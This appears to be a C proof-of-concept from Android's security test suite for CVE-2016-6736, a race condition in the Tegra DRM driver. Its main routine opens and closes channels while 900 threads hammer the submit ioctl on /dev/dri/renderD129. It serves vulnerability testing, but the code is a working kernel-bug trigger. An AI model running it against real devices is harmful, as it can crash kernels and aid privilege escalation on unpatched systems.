Home | History | Annotate | Download | only in CVE-2016-6736 
      1 /*
      2  * Copyright (C) 2017 The Android Open Source Project
      3  *
      4  * Licensed under the Apache License, Version 2.0 (the "License");
      5  * you may not use this file except in compliance with the License.
      6  * You may obtain a copy of the License at
      7  *
      8  *      http://www.apache.org/licenses/LICENSE-2.0
      9  *
     10  * Unless required by applicable law or agreed to in writing, software
     11  * distributed under the License is distributed on an "AS IS" BASIS,
     12  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
     13  * See the License for the specific language governing permissions and
     14  * limitations under the License.
     15  */
     16 #define _GNU_SOURCE
     17 #include <stdio.h>
     18 #include <stdlib.h>
     19 #include <pthread.h>
     20 #include <sys/ioctl.h>
     21 #include <errno.h>
     22 #include <sys/stat.h>
     23 #include <fcntl.h>
     24 #include <sched.h>
     25 #include <sys/types.h>
     26 #include <signal.h>
     27 #include <unistd.h>
     28 
     29 #define SUBMIT_THREAD_NUM	900
     30 #define TRY_TIMES	SUBMIT_THREAD_NUM
     31 #define DEV "/dev/dri/renderD129"
     32 
     33 #define SIOCIWFIRSTPRIV 0x8BE0
     34 #define SIOCGIWNAME     0x8B01
     35 #define IOCTL_SET_STRUCT_FOR_EM         (SIOCIWFIRSTPRIV + 11)
     36 #define PRIV_CUSTOM_BWCS_CMD            13
     37 #define PRIV_CMD_OID                    15
     38 #define PRIV_CMD_SW_CTRL                20
     39 #define PRIV_CMD_WSC_PROBE_REQ          22
     40 
     41 enum host1x_class {
     42         HOST1X_CLASS_HOST1X = 0x1,
     43         HOST1X_CLASS_NVENC = 0x21,
     44         HOST1X_CLASS_VI = 0x30,
     45         HOST1X_CLASS_ISPA = 0x32,
     46         HOST1X_CLASS_ISPB = 0x34,
     47         HOST1X_CLASS_GR2D = 0x51,
     48         HOST1X_CLASS_GR2D_SB = 0x52,
     49         HOST1X_CLASS_VIC = 0x5D,
     50         HOST1X_CLASS_GR3D = 0x60,
     51         HOST1X_CLASS_NVJPG = 0xC0,
     52         HOST1X_CLASS_NVDEC = 0xF0,
     53 };
     54 
     55 #define DRM_COMMAND_BASE                0x40
     56 #define DRM_COMMAND_END                 0xA0
     57 
     58 #define DRM_TEGRA_OPEN_CHANNEL          0x05
     59 #define DRM_TEGRA_CLOSE_CHANNEL         0x06
     60 #define DRM_TEGRA_SUBMIT		0x08
     61 
     62 struct drm_tegra_open_channel {
     63         __u32 client;
     64         __u32 pad;
     65     volatile __u64 context;
     66 };
     67 
     68 struct drm_tegra_close_channel {
     69     volatile __u64 context;
     70 };
     71 
     72 struct drm_tegra_submit {
     73 	__u64 context;
     74 	__u32 num_syncpts;
     75 	__u32 num_cmdbufs;
     76 	__u32 num_relocs;
     77 	__u32 num_waitchks;
     78 	__u32 waitchk_mask;
     79 	__u32 timeout;
     80 	__u64 syncpts;
     81 	__u64 cmdbufs;
     82 	__u64 relocs;
     83 	__u64 waitchks;
     84 	__u32 fence;		/* Return value */
     85 	__u32 reserved0;
     86 	__u64 fences;
     87 	__u32 reserved1[2];	/* future expansion */
     88 };
     89 
     90 #define DRM_IOCTL_BASE                  'd'
     91 #define DRM_IOWR(nr,type)               _IOWR(DRM_IOCTL_BASE,nr,type)
     92 
     93 #define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
     94 #define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
     95 #define DRM_IOCTL_TEGRA_SUBMIT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_SUBMIT, struct drm_tegra_submit)
     96 
     97 int fd;
     98 pthread_t submit_thread_id[SUBMIT_THREAD_NUM] = { 0 };
     99 
    100 volatile struct drm_tegra_open_channel open_c = { 0 };
    101 volatile struct drm_tegra_close_channel close_c = { 0 };
    102 volatile struct drm_tegra_submit submit_c = { 0 };
    103 
    104 static int set_affinity(int num)
    105 {
    106 	int ret = 0;
    107 	cpu_set_t mask;
    108 	CPU_ZERO(&mask);
    109 	CPU_SET(num, &mask);
    110 	ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
    111 	return ret;
    112 }
    113 
    114 static void prepare()
    115 {
    116 	open_c.client = HOST1X_CLASS_VIC;
    117 }
    118 
    119 void* submit_thread(void* no_use)
    120 {
    121 	set_affinity(1);
    122 
    123 	while(1){
    124 		ioctl(fd, DRM_IOCTL_TEGRA_SUBMIT, &submit_c);
    125 	}
    126 }
    127 
    128 int main()
    129 {
    130 	int i, try_time = TRY_TIMES, ret;
    131 
    132 	/* bind_cpu */
    133 	set_affinity(0);
    134 
    135 	/* open dev */
    136 	fd = open(DEV,O_RDONLY);
    137 	if(fd == -1){
    138 		return 0;
    139 	}
    140 
    141 	/* prepare ioctl cmd */
    142 	prepare();
    143 
    144 	/* create submit thread */
    145 	for(i = 0; i < SUBMIT_THREAD_NUM; i++){
    146 		ret = pthread_create(submit_thread_id + i, NULL, submit_thread, NULL);
    147 		if(ret){
    148 			goto out_submit_thread;
    149 		}
    150 	}
    151 
    152 	while(try_time){
    153 		/* open */
    154 		ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
    155 		if(ret == 0){
    156 			try_time--;
    157 			/* set submit */
    158 			submit_c.context = open_c.context;
    159 			/* set close */
    160 			close_c.context = open_c.context;
    161 			usleep(500);
    162 			ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
    163 		}
    164 	}
    165 
    166 out_submit_thread:
    167 	/* kill submit thread */
    168 	for(i = 0; i < SUBMIT_THREAD_NUM; i++){
    169 			pthread_kill(submit_thread_id[i], SIGKILL);
    170 	}
    171 out_dev:
    172 	close(fd);
    173 	return 0;
    174 }
    175